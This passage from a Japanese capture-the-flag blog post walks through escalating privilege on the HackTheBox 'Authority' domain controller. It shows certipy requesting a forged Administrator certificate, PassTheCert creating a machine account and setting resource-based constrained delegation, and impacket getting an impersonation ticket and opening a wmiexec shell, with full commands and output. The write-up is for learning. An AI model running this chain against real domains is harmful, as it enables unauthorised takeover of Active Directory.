[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.11.152[49722]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.11.152[49722]
[-] Got error: Unknown DCE RPC fault status code: 00000721
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/certipy/entry.py", line 60, in main
    actions[options.action](options)
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/parsers/req.py", line 12, in entry
    req.entry(options)
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 767, in entry
    request.request()
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 718, in request
    cert = self.interface.request(csr, attributes)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 208, in request
    response = self.dce.request(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 859, in request
    answer = self.recv()
             ^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1332, in recv
    raise DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)
impacket.dcerpc.v5.rpcrt.DCERPCException: Unknown DCE RPC fault status code: 00000721

DCとのやり取りで時刻同期ズレのエラーが発生するのようなのでntpdateを使って解消するようにしましょう。

┌──(root㉿kali)-[~/work]
└─# ntpdate 10.129.11.152
2023-07-19 02:48:28.172973 (-0400) +14391.840508 +/- 0.138896 10.129.11.152 s1 no-leap
CLOCK: time stepped by 14391.840508
┌──(root㉿kali)-[~/work]
└─# certipy req -username TEST$@AUTHORITY.HTB -password 123456 -ca AUTHORITY-CA -dc-ip 10.129.11.152 -template CorpVPN -upn Administrator@AUTHORITY.HTB -debug -target authority.authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'authority.authority.htb' at '10.129.11.152'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Administrator@AUTHORITY.HTB'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

administrator.pfxが作成されたので、此奴でKerberousさんに認証要求します。

┌──(root㉿kali)-[~/work]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.11.152 
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

ダメと言われます。
えぇ...明らかこの前のEscapeより難しいぞ。

PassTheCert

Exploit考察

Smart Card Logonを利用するExtended Key Usagesが証明書に含まれてない場合、上記のKDC_ERR_PADATA_TYPE_NOSUPPエラーになることがあるようです。このような状況では証明書を使ったKerberos認証での権限昇格は出来ません。

なので、別のプロトコルに対して偽装した証明書で悪さしようという考えになる。TLSを利用している認証はLDAPSなどがある。このプロトコルを使って攻撃しようといった考えですな。

この考え方については以下のPassTheCertのドキュメントに詳しく記載されているので読んでみればいいかなと思う。

ここらのドキュメントに攻撃の具体的な実施方法(上記ではResource-Based Constrained Delegation攻撃)も記載されている。マシン作成ができ、_msDS-AllowedToActOnBehalfOfOtherIdentity_の設定も証明書があるのでうまくいきそう。試す価値はあるとみる。RBCD攻撃については以下を参考にして欲しい。

まずはこの攻撃を実施するためにPassTheCert.exeを入手する。以下リポジトリからバイナリを拝借。

PassTheCert実施

Administratorを騙るDESKTOP-1337$を作成する。

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> .\PassTheCert.exe --server 127.0.0.1 --cert-path C:\Users\svc_ldap\Documents\administrator.pfx --add-computer --computer-name DESKTOP-1337$
No password given, generating random one.
Generated password: 99U1VOMhRX6LEvISJJQ9PMo07osUJLcp
Success

ドメインコントローラーauthorityのディレクトリツリーを確認するために以下コマンドを打つ。

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-DomainComputer authority


pwdlastset                               : 6/22/2023 2:29:41 PM
logoncount                               : 1322
msds-generationid                        : {164, 41, 7, 98...}
serverreferencebl                        : CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
badpasswordtime                          : 12/31/1600 7:00:00 PM
msds-additionaldnshostname               : {authority.htb.corp, AUTHORITY}
distinguishedname                        : CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
objectclass                              : {top, person, organizationalPerson, user...}
displayname                              : AUTHORITY$
lastlogontimestamp                       : 7/18/2023 8:30:26 PM
name                                     : AUTHORITY
primarygroupid                           : 516
objectsid                                : S-1-5-21-622327497-3269355298-2248959698-1000
samaccountname                           : AUTHORITY$
localpolicyflags                         : 0
codepage                                 : 0
samaccounttype                           : MACHINE_ACCOUNT
whenchanged                              : 7/19/2023 10:42:41 AM
accountexpires                           : NEVER
cn                                       : AUTHORITY
operatingsystem                          : Windows Server 2019 Standard
instancetype                             : 4
msdfsr-computerreferencebl               : CN=AUTHORITY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=authority,DC=htb
objectguid                               : 23c88ddb-c76e-41bd-8b75-dd04e08431cc
operatingsystemversion                   : 10.0 (17763)
lastlogoff                               : 12/31/1600 7:00:00 PM
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}

こいつのmsDS-AllowedToActOnBehalfOfOtherIdentityに作成したDESKTOP-1337$のSIDを追加します。
そのためにSIDを確認しておきます。

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-DomainComputer DESKTOP-1337


pwdlastset             : 7/19/2023 7:14:53 AM
logoncount             : 0
badpasswordtime        : 12/31/1600 7:00:00 PM
distinguishedname      : CN=DESKTOP-1337,CN=Computers,DC=authority,DC=htb
objectclass            : {top, person, organizationalPerson, user...}
name                   : DESKTOP-1337
objectsid              : S-1-5-21-622327497-3269355298-2248959698-12106
samaccountname         : DESKTOP-1337$
localpolicyflags       : 0
codepage               : 0
samaccounttype         : MACHINE_ACCOUNT
accountexpires         : NEVER
countrycode            : 0
whenchanged            : 7/19/2023 11:14:53 AM
instancetype           : 4
usncreated             : 266585
objectguid             : 41ecd55b-1ede-450f-bbc3-440d73db785f
lastlogoff             : 12/31/1600 7:00:00 PM
objectcategory         : CN=Computer,CN=Schema,CN=Configuration,DC=authority,DC=htb
dscorepropagationdata  : 1/1/1601 12:00:00 AM
serviceprincipalname   : {RestrictedKrbHost/DESKTOP-1337.authority.htb, RestrictedKrbHost/DESKTOP-1337, HOST/DESKTOP-1337.authority.htb, HOST/DESKTOP-1337}
lastlogon              : 12/31/1600 7:00:00 PM
badpwdcount            : 0
cn                     : DESKTOP-1337
useraccountcontrol     : WORKSTATION_TRUST_ACCOUNT
whencreated            : 7/19/2023 11:14:53 AM
primarygroupid         : 515
iscriticalsystemobject : False
usnchanged             : 266587
dnshostname            : DESKTOP-1337.authority.htb

よし、確認できたのでDESKTOP-1337$のSIDを追加します。

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> .\PassTheCert.exe --server 127.0.0.1 --cert-path C:\Users\svc_ldap\Documents\administrator.pfx --rbcd --target "CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb" --sid "S-1-5-21-622327497-3269355298-2248959698-12106"
msDS-AllowedToActOnBehalfOfOtherIdentity attribute exists. Saving old value to disk.
You can restore it using arguments:
        --target "CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb" --restore CN=AUTHORITY,OU=Domain_Controllers,DC=authority,DC=htb_msDS-AllowedToActOnBehalfOfOtherIdentity_20230719T071538Z.txt
Success

後はRBCD攻撃を実施するだけです。

RBCD攻撃

MS-SFU Kerberosの拡張機能(S4U)を使ってTGSからサービスチケット(ST)をゲットしに行きます。
impacketのgetServiceTicketで制約付き委任の代理要求を行えるので便利です。

┌──(root㉿kali)-[~/work]
└─# impacket-getST -spn 'cifs/authority.authority.htb' -impersonate Administrator 'authority.htb/DESKTOP-1337$:99U1VOMhRX6LEvISJJQ9PMo07osUJLcp'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Administrator.ccacheにSTが格納されているので、これを環境変数に埋め込みます。

┌──(root㉿kali)-[~/work]
└─# export KRB5CCNAME=Administrator.ccache

cifsへのSTが手に入ったのでそのまま突撃します。

┌──(root㉿kali)-[~/work]
└─# impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

ぐぬぬ、、、時刻を修正する。

┌──(root㉿kali)-[~/work]
└─# ntpdate 10.129.7.87                                                             
2023-07-19 07:17:42.120146 (-0400) +14397.602014 +/- 0.123917 10.129.7.87 s1 no-leap
CLOCK: time stepped by 14397.602014

これの流れを何度か繰り返してやっと入ることが出来ました。

┌──(root㉿kali)-[~/work]
└─# impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

8.png
Administrator権限ゲットだぜ!!!

まとめ

9.png
これで特権昇格に成功し、Administrator権限を奪取できました。
脆弱性を発見してからの悪用が難しく、PassTheCertのよい勉強になります。
後半の内容である権限昇格にADCSを悪用する方法はLTで発表した以下資料もあるので参考にしてみてください。

個人的にEscapeの上位互換のBoxだと感じました。
Hardでは????

明日は@takao-hさんです。

3
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
3
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?